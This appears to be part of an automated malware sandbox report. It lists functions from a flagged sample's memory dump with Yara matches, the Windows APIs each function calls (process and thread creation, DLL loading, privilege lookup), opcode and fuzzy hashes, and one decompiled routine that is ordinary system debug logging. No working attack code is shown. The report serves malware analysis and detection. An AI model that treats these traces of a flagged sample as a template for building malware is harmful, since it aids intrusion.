                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                      • Instruction ID: 762bea10523743d14d4c83261debf74a934049ffc8e831442e808f9aacaa69ee
                                      • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                      • Instruction Fuzzy Hash: 9601A731A8026977E725A6949C02FBE776C5B41F91F540114FF04BA1C1EBD4690A4BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F19B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F19BB2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 10d4d7bf0bbb76a698ab9d8fdce276b0f6384cc422bd6a4df75049893333db80
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: D9011EB5D0020DBBDF10DAA4DC41F9DB7799B54348F004195EA0897284F671EB18CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F289B4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 4272f7cef53e8a1835ef9bb6f6a34d37577edbaea4f174d67556fcd06a362733
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 0201B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F2895E, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F289B4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 2d6cf5ca736b311a94376a6dba795589f26f8a5f09a89e66617611cee2647850
                                      • Instruction ID: b76b6854ba76b24c7ad6098b98116affece55e0b03efdc4417d88764b8f864cf
                                      • Opcode Fuzzy Hash: 2d6cf5ca736b311a94376a6dba795589f26f8a5f09a89e66617611cee2647850
                                      • Instruction Fuzzy Hash: 3D01AFB2214108AFDB58DF89DC81EEB37ADAF8C754F158258FE1D97241D630E851CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F27430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F1CCF0,?,?), ref: 02F2746C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
                                      • Instruction ID: 3723ad7f98d43ecee74993ed5526a85c98377c9bbff1e25605d113e24c4008b1
                                      • Opcode Fuzzy Hash: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
                                      • Instruction Fuzzy Hash: 08E06D737802243AE22065A99C02FA7B29C8B82B64F540026FB4DEA2C0D595F80546A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28A41, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1CFC2,02F1CFC2,?,00000000,?,?), ref: 02F28A80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 4e7d721f8328b8f51a01c1d00dbe43bd949a04adb7d464723908b40d29176f68
                                      • Instruction ID: 2d49eef7d67b989b1bb8abb3d4aa4c1c768ddc82e81ffc8153cc36f587d7f81a
                                      • Opcode Fuzzy Hash: 4e7d721f8328b8f51a01c1d00dbe43bd949a04adb7d464723908b40d29176f68
                                      • Instruction Fuzzy Hash: 2FF0ECB6210214ABDB24EF88DC45EE737B9EF853A0F008065FA0C5B202D531E816CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F27424, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F1CCF0,?,?), ref: 02F2746C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: ec6bfc528b8c059351f13563a2afb26f769df41b280fdb9eba7754a605d37bce
                                      • Instruction ID: 61f51fa125f9aeb0c8532a70e0aab8e2aeedfcd6ef548c3c1549ab60ee0eae6e
                                      • Opcode Fuzzy Hash: ec6bfc528b8c059351f13563a2afb26f769df41b280fdb9eba7754a605d37bce
                                      • Instruction Fuzzy Hash: CFF022327907103AE23035688C03F97B25CCB82FA4F640028FF19AB2C0D994F80843A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28922, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(02F23536,?,02F23CAF,02F23CAF,?,02F23536,?,?,?,?,?,00000000,00000000,?), ref: 02F288DD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 4a5f5bb0c79bc480d33d084326274a1fadb27943092301cfc1423ead36c83616
                                      • Instruction ID: 47915c4782cb99ad96d039abf059211316c2402395e78c58071e6638e004de7b
                                      • Opcode Fuzzy Hash: 4a5f5bb0c79bc480d33d084326274a1fadb27943092301cfc1423ead36c83616
                                      • Instruction Fuzzy Hash: E4E06DB2640224AFDB14EF64DC48EA77768AF86394F114158FA086B191C231F919CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1CFC2,02F1CFC2,?,00000000,?,?), ref: 02F28A80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: d1d2dfa52dd5461a40df9b98f705adda90a5cb2e89c84a9738ef6b13686cb5cf
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: D8E01AB12002186BDB10DF49CC84EE737ADAF89650F118154FE0857241C930E914CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F288B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(02F23536,?,02F23CAF,02F23CAF,?,02F23536,?,?,?,?,?,00000000,00000000,?), ref: 02F288DD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 59b9e670a9d4c6c31411ee701fcded9a826a00a45f66b27a4203a9d60f4c617e
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: F8E046B1200218ABDB14EF99CC44EA777ADEF88790F118558FE085B241C630F914CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F1D427, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F17C83,?), ref: 02F1D45B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: fb9a62114719d4365fa9ed6b2ac8ff86b6e63830a065c6325675c0013ad5295d
                                      • Instruction ID: 7b787a93899b452afb2a3d51c323ab00c230bf3dec57eeeb0aedd2e5576f7da4
                                      • Opcode Fuzzy Hash: fb9a62114719d4365fa9ed6b2ac8ff86b6e63830a065c6325675c0013ad5295d
                                      • Instruction Fuzzy Hash: 19E0C272A502042AEB14EFA49C13F9773A5AF25BC0F8A40A4FA88DB387EA65D5058611
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F1D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F17C83,?), ref: 02F1D45B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction ID: 9cd4186fad4e26249f16c9e837e1e0a1369157417f975968d5c9cee9279d808e
                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction Fuzzy Hash: 9AD0A7717503083BE710FAA89C13F2633CD5B45B84F494064FB48D73C3DA54F4058561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0376967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0fd06d084880cc76b42f7508f84834baadd3dc58262f127501e257c14ec3c0c3
                                      • Instruction ID: 21366c38769c8bbe3a5472d1b332b0c02609fdc0b829177763d0711acb8457d8
                                      • Opcode Fuzzy Hash: 0fd06d084880cc76b42f7508f84834baadd3dc58262f127501e257c14ec3c0c3
                                      • Instruction Fuzzy Hash: 0AB09B719015C5C9FA11D760470871779447BD5741F16C061D2020641A4778C091F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 037BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E037BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0376CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E037B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E037B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x037bfdda
                                      0x037bfde2
                                      0x037bfde5
                                      0x037bfdec
                                      0x037bfdfa
                                      0x037bfdff
                                      0x037bfe0a
                                      0x037bfe0f
                                      0x037bfe17
                                      0x037bfe1e
                                      0x037bfe19
                                      0x037bfe19
                                      0x037bfe19
                                      0x037bfe20
                                      0x037bfe21
                                      0x037bfe22
                                      0x037bfe25
                                      0x037bfe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037BFDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037BFE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037BFE01
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 8fc867ae0da030e2f21de6e5bed8e52925184cc87b485f72ef503ffebd5264cf
                                      • Instruction ID: 776ef4d646dbef420b065e56c6a1c6a292dd5e81dc9b8908947d31dbe9a24356
                                      • Opcode Fuzzy Hash: 8fc867ae0da030e2f21de6e5bed8e52925184cc87b485f72ef503ffebd5264cf
                                      • Instruction Fuzzy Hash: BEF0C8762006017FD7215E45DC05F67BB7ADB45730F140214F624591D1D962B83096A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%